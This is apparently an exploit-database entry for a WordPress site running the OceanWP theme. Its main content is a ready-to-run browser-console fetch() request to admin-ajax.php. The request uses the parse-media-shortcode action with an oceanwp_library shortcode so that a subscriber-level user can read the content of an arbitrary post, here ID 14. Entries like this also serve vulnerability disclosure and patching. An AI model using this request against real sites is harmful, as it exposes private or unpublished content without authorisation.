Share
## https://sploitus.com/exploit?id=WPEX-ID:9CAA8D2E-383B-47D7-8D21-D2ED6B1664CB
Note: This requires the OceanWP theme to be installed and active

Run the below command in the developer console of the web browser while being on the blog as a subscriber

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[oceanwp_library id='14']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

This will display the content of the post with ID 14